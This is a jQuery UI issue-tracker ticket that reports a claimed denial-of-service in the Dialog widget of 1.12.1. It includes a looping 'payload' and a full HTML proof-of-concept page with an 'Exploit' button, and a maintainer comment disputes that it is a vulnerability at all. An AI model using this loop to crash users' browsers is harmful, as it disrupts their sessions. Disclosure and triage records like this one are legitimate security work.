Skip to main content

Search and Top Navigation

#15390 new bug ()

Opened November 25, 2020 07:38PM UTC

Last modified January 29, 2021 09:34AM UTC

Denial of Service (DoS) - jQuery UI 1.12.1 - Dialog

Reported by: rafaelcintralopes Owned by:
Priority: major Milestone: none
Component: ui.dialog Version: 1.12.1
Keywords: Cc:
Blocked by: Blocking:
Description

When we inject the "dialog" for any HTML tag, more than once, the browser and the application crashes, closing the application.

**Payload:

**

for (var i = 0; i < 10; i++) {
$("div").dialog({title:'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'});
}

**PoC:

**

Create an HTML file with the following code or insert the Payload above in a vulnerable environment:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>DoS - jQuery UI 1.12.1</title>
</head>
<body>
    <h2>DoS - jQuery UI 1.12.1</h2>

    <div>
        <button onclick="exploit()">Exploit</button>
    </div>

    <p>PoC by Rafael Cintra Lopes</p>

    <script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
    <script src="https://code.jquery.com/ui/1.12.1/jquery-ui.min.js" integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script>

    <script>
        function exploit(){
            for (var i = 0; i < 10; i++) {
                $("div").dialog({title:'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'});
            }
        }
    </script>
</body>
</html>
Attachments (0)
Change History (3)

Changed November 25, 2020 07:39PM UTC by rafaelcintralopes comment:1

priority: minormajor

Changed January 22, 2021 08:55AM UTC by adriaon comment:2

_comment0: Is work being done on this one? Cheers.1611315748879149

https://snyk.io/vuln/SNYK-JS-JQUERYUI-1052825

Is work being done on this one? Cheers.

Changed January 29, 2021 09:32AM UTC by xfix comment:3

_comment0: Not a security vulnerability in my opinion (this issue was reported as CVE-2020-28488). You are just spawning dialogue boxes in dialogue boxes - dialogue boxes themselves are made of `div`s which leads to exponential growth of dialogue boxes.1611912832158751
_comment1: Not a security vulnerability in my opinion (this issue was reported as CVE-2020-28488). You are just spawning dialogue boxes in dialogue boxes - dialogue boxes themselves are made of `div`s which leads to exponential growth of dialogue boxes as you are spawning a dialogue box for each `div` in the document.1611912853881555

Not a security vulnerability in my opinion (this issue was reported as CVE-2020-28488) or even a bug for that matter. You are just spawning dialogue boxes in dialogue boxes - dialogue boxes themselves are made of divs which leads to exponential growth of dialogue boxes as you are spawning a dialogue box for each div in the document.